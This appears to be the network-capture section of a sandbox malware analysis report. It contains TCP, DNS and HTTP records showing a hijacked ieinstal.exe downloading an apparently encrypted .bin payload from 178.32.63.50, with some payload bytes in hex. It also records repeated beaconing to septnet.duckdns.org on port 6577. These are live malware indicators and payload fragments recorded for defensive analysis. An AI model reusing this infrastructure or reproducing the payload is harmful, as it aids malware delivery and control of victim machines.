Oct 12, 2021 04:40:11.550071001 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550117016 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550126076 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550162077 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550164938 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550184011 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550194025 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550209999 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550256968 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550302029 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550318956 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550358057 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550424099 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550436020 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567262888 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567397118 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567445040 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567447901 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567492008 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567538023 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567585945 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567598104 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567609072 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567706108 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567703962 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567750931 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567784071 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567831039 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567877054 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567923069 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567985058 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568001032 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568032980 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568041086 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568082094 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568128109 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568151951 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568173885 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568190098 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568201065 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568222046 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568268061 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568309069 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568314075 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568348885 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568360090 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568361998 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568408012 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568453074 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568468094 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568497896 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568506956 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568516970 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568545103 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568592072 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568638086 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568643093 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568681955 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568682909 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568691969 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568730116 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568774939 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568802118 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568820953 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568840981 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568867922 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568907976 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568917990 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568923950 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568957090 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.569005966 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.569108963 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.585963964 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586096048 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586144924 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586191893 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586195946 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.586237907 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586294889 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586343050 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.586383104 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.586492062 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.586523056 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586530924 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.586570978 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586616039 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586663008 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586709023 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586747885 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.586786985 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.586796999 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.586884022 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586914062 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.586929083 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.586977005 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587022066 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587061882 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587066889 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587100983 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587111950 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587114096 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587253094 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587256908 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587265015 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587296963 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587306023 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587378979 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587431908 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587438107 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587440014 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587441921 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587444067 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587457895 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587469101 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587503910 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587551117 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587568045 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587579012 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587605953 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587616920 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587626934 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587635040 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587641001 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587666035 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587676048 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587687016 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587733030 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587764025 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587774038 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587778091 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587826014 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587869883 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587872982 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587882042 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587919950 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.587965012 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.587966919 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588012934 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588013887 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588062048 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588062048 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588109016 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588110924 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588155985 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588197947 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588202000 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588248968 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588294029 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588298082 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588341951 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588346004 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588388920 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588395119 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588434935 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588443995 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588481903 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588527918 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588572979 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588617086 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588620901 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588632107 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588664055 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588710070 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588718891 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588728905 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588757038 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588802099 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588816881 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588848114 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588865995 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.588895082 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588941097 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.588985920 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.589031935 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.589078903 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.589097977 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.589124918 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.589147091 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.589171886 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.589217901 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.589252949 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.589260101 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.589308977 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.589422941 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:13.276848078 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:40:13.328300953 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:40:13.328517914 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:40:13.328840971 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:40:13.427336931 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:40:13.449644089 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:40:13.452266932 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:40:13.549714088 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:40:17.015897989 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:17.016098022 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:47.483217001 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:40:47.484738111 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:40:47.584546089 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:41:47.789803982 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:41:47.791326046 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:41:47.906167030 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:42:01.377258062 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:42:01.689580917 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:42:02.298824072 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:42:03.501604080 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:42:05.907407045 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:42:10.718708038 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:42:20.326047897 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:42:48.120421886 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:42:48.121865988 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:42:48.226365089 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:43:48.425021887 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:43:48.426506042 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:43:48.533534050 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:44:48.740112066 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:44:48.741622925 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:44:48.845427036 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:45:49.072201967 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:45:49.073704004 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:45:49.168199062 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:46:49.409982920 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:46:49.411421061 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:46:49.537755013 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:47:49.745754957 CEST	6577	49790	193.104.197.90	192.168.11.20
Oct 12, 2021 04:47:49.746238947 CEST	49790	6577	192.168.11.20	193.104.197.90
Oct 12, 2021 04:47:49.853620052 CEST	6577	49790	193.104.197.90	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2021 04:40:13.160449028 CEST	63817	53	192.168.11.20	1.1.1.1
Oct 12, 2021 04:40:13.273529053 CEST	53	63817	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 12, 2021 04:40:13.160449028 CEST	192.168.11.20	1.1.1.1	0xd66b	Standard query (0)	septnet.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 12, 2021 04:40:13.273529053 CEST	1.1.1.1	192.168.11.20	0xd66b	No error (0)	septnet.duckdns.org		193.104.197.90	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

178.32.63.50

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49788	178.32.63.50	80	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
Oct 12, 2021 04:40:11.434408903 CEST	6590	OUT	GET /mvbs/Host_hKVPgVgQ234.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 178.32.63.50 Cache-Control: no-cache
Oct 12, 2021 04:40:11.514601946 CEST	6592	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 02:40:11 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Fri, 08 Oct 2021 10:38:20 GMT ETag: "28240-5cdd4fa582ee3" Accept-Ranges: bytes Content-Length: 164416 Content-Type: application/octet-stream Data Raw: de cd ed 55 70 44 e8 e9 15 39 ed 96 9a 4b d5 21 44 02 b7 8c 2c 87 3f ad 25 01 88 fd 3c 25 10 53 0d 78 31 cb 5c ec 2f 65 f6 4f 5e 51 5f 39 fa 2b 32 fc af 68 63 f2 85 d5 45 f5 e7 08 35 51 6f 17 d3 55 26 99 82 40 71 fe 8a 32 cc b2 b9 24 2d 92 e6 b2 c2 ce c8 6f b9 5b 66 dc 72 52 44 75 16 17 49 75 de cb be d9 b1 7b 94 7d d5 a8 9b b4 54 9d 2f f3 50 07 29 20 87 d9 ce ba a2 b6 c8 0c 78 48 e8 39 3b 45 d6 e5 b3 08 9b f4 3d 0c 64 74 ba 6b c4 da 74 7f 9f d8 49 98 a5 79 09 c7 2a c5 67 58 39 a9 7c fa 5e c7 e6 a9 e1 25 3c 77 2f 31 3b 5f 8e e6 72 0d b6 5a db 51 3f 06 47 f8 a6 76 19 4a 08 41 bd 87 eb a3 4d a3 bb 6c 95 69 3f d7 1a 08 02 a3 d5 4a e5 a6 74 f3 7a d8 b3 44 f9 46 7b ff 76 52 7e 81 b9 e7 48 e1 99 57 f0 fe b5 9c 6e 64 d7 19 b7 9c f9 ae 12 09 98 77 ea 20 00 d1 f4 1b 85 4d fe 42 b5 09 53 bb 5a 63 dd a4 53 38 52 2d 1f ff f3 76 c5 92 23 c0 e9 78 83 3f 12 c6 56 ef 7d 83 ce 10 54 67 b6 82 d3 82 b7 d4 75 c5 49 3b 68 5a b8 fc ef c1 18 bd c8 9c b0 55 f8 97 ad 4b a4 dc b5 a1 e2 38 26 8b 42 40 be b6 70 43 01 e2 2c 50 0d db 9e b5 53 e2 70 f5 30 97 34 58 52 ca 59 8a 6f 6e d3 8a 74 41 c3 e5 5f e2 c0 99 ff 75 f0 1a e5 25 83 67 f7 35 59 b9 00 4f 94 fb 84 63 da 11 ba 0f 30 7d af ab 85 ee ce 4f 2a fb ec 91 76 52 06 65 23 91 57 d3 70 fe cf f6 cb 72 87 30 8f 86 ca 92 d7 07 db 19 cf cb 01 41 af 2b b1 6e 7d 0e a3 d0 7f 87 1a 39 17 a4 b7 e1 33 20 66 04 cd a5 81 69 03 17 ce 79 24 3f 78 5a e2 ce 58 b6 f7 ee 7d 10 1f 27 65 aa 02 b4 ed 18 d0 ff 68 c6 0e 0e 46 c8 1d f2 fb 52 5a 63 3b 0c 17 45 7f f1 15 47 aa 0c 9d ae 66 c1 e7 17 06 9a ee 38 f4 bd f5 c0 1d f6 1b 16 bc 78 da a3 3d 1a e2 13 86 b8 6f cc 1c c8 cc 82 c5 d9 7f 71 ac 78 91 9b 3d a5 fb d8 af a8 9e 01 e6 6b 4d 44 c7 51 d8 a8 94 cf 88 d8 e5 22 be f4 b0 52 05 bb d9 e2 49 da d2 90 75 79 88 91 ad c6 55 08 26 27 72 c7 a6 e0 97 a6 45 04 3a 43 93 31 9d 4b 4d a4 16 20 0c 06 9e 90 6b 0d c4 4f 6d a3 89 ad 28 e5 a0 56 40 45 68 ce 13 d3 25 fd 13 fe 7a 52 0b fb c0 ef 83 76 88 c9 2d 4d a0 82 36 fb b6 16 ac d7 14 6c 61 ac d3 64 b1 ca f0 c7 32 0b 3e d0 99 f9 70 ba b1 9f 5d de 30 f4 d9 61 a8 ea 32 5f e8 7e 49 ab 40 9b a8 4b fe c5 a5 78 ee 54 e3 ec 4c 2d 08 45 73 a0 67 06 d3 1c b7 b7 5b 80 03 80 88 45 a7 b3 72 da 4b eb 9d c1 7c 07 d5 fe 36 bd 92 56 22 d1 95 3e 34 66 c6 0d fe 94 c7 0d 35 8b a9 4c d1 85 80 0c 80 60 13 7a da 17 bb 7e 17 a5 de bf 62 53 da 72 65 cc 7f d6 e9 08 1e b2 4c 45 e5 ef 2d c1 44 ac d4 de bb 8c e2 72 e6 4f 55 72 ee 78 67 28 46 ff 8f 75 bc ee bd 58 5f aa 9c 0a e2 7e 98 b8 c5 3e bc d3 51 09 27 90 c0 9e e4 46 9d a5 00 04 99 a4 8c 4e e6 7b 00 92 b1 c1 9d e3 61 db b7 56 eb f7 2e 76 9b bb 1a 69 db 78 e3 7a b5 15 fc 0a a9 92 e4 4b 29 d2 c2 8c 27 56 c2 5e 06 55 39 59 ee 32 50 54 d2 79 cb 8f a7 67 b1 5a 35 3a 57 e0 a6 64 b3 03 79 01 34 e1 99 67 5e d6 ce dc 37 64 85 d9 b5 56 6b f0 8e b9 a9 28 85 c9 b8 5c b1 b9 72 9e 0f b6 99 81 40 71 fe 8e 32 cc b2 46 db 2d 92 5e b2 c2 ce c8 6f b9 5b 26 dc 72 52 44 75 16 17 49 75 de cb be d9 b1 7b 94 7d d5 a8 9b b4 54 9d 2f f3 50 07 29 20 87 d9 ce ba a2 b6 48 0c 78 48 e6 26 81 4b d6 51 ba c5 ba 4c 3c 40 a9 55 ee 03 ad a9 54 0f ed b7 2e ea c4 14 29 a4 4b ab 09 37 4d 89 1e 9f 7e b5 93 c7 c1 4c 52 57 6b 7e 68 7f e3 89 16 68 98 57 d6 5b 1b 06 47 f8 a6 76 19 4a 58 04 bd 87 a7 a2 4a a3 fd 15 5f Data Ascii: UpD9K!D,?%<%Sx1\/eO^Q_9+2hcE5QoU&@q2$-o[frRDuIu{}T/P) xH9;E=dtktIygX9\|^%<w/1;_rZQ?GvJAMli?JtzDF{vR~HWndw MBSZcS8R-v#x?V}TguI;hZUK8&B@pC,PSp04XRYontA_u%g5YOc0}OvRe#Wpr0A+n}93 fiy$?xZX}'ehFRZc;EGf8x=oqx=kMDQ"RIuyU&'rE:C1KM kOm(V@Eh%zRv-M6lad2>p]0a2_~I@KxTL-Esg[ErK\|6V">4f5L`z~bSreLE-DrOUrxg(FuX_~>Q'FN{aV.vixzK)'V^U9Y2PTygZ5:Wdy4g^7dVk(\r@q2F-^o[&rRDuIu{}T/P) HxH&KQL<@UT.)K7M~LRWk~hhW[GvJXJ_
Oct 12, 2021 04:40:11.514667988 CEST	6593	IN	Data Raw: 37 3f d7 1a 08 02 a3 d5 4a 05 a6 7a f0 71 d9 b1 5d f9 40 79 ff 76 2a 7e d7 ea be 93 62 58 67 37 fb f1 a4 2c 64 28 c6 4a 63 3e aa 76 a9 7c 25 ea c8 6f ff f4 1b 46 49 da e2 56 4b 53 53 3d 4f dd a4 d8 0d 82 98 5d cf 37 73 f5 25 61 c0 e4 c6 81 3f d7 Data Ascii: 7?Jzq]@yv~bXg7,d(Jc>v\|%oFIVKSS=O]7s%a?[?Twq1uI;F1I>KY@"Ko,'M4Xot%kOTQ$}V2vd#WZCTU#-?KTH
Oct 12, 2021 04:40:11.514717102 CEST	6594	IN	Data Raw: c6 0c 2c e2 dc 5c 6e cf 76 45 a5 78 ee 07 26 68 68 ad 08 45 73 88 a3 82 f7 93 b7 b7 5b a5 c5 04 ac d5 a7 b3 32 a9 bd 2d b9 50 7c 07 d5 fe f1 b9 b6 ac 0b 93 95 40 76 8e 00 ec ff 94 4a 99 11 47 ab 4c d1 0c c4 28 8c ed 97 5e 16 17 bb 7e d0 e1 fa bb Data Ascii: ,\nvEx&hhEs[2-P\|@vJGL(^~fQr[`L:?)D!QkE\'T9^Nr<QFZ$No?$<Da>rSxxnUo9'zP9Yp~~~sNdyIc^GV0I<.\
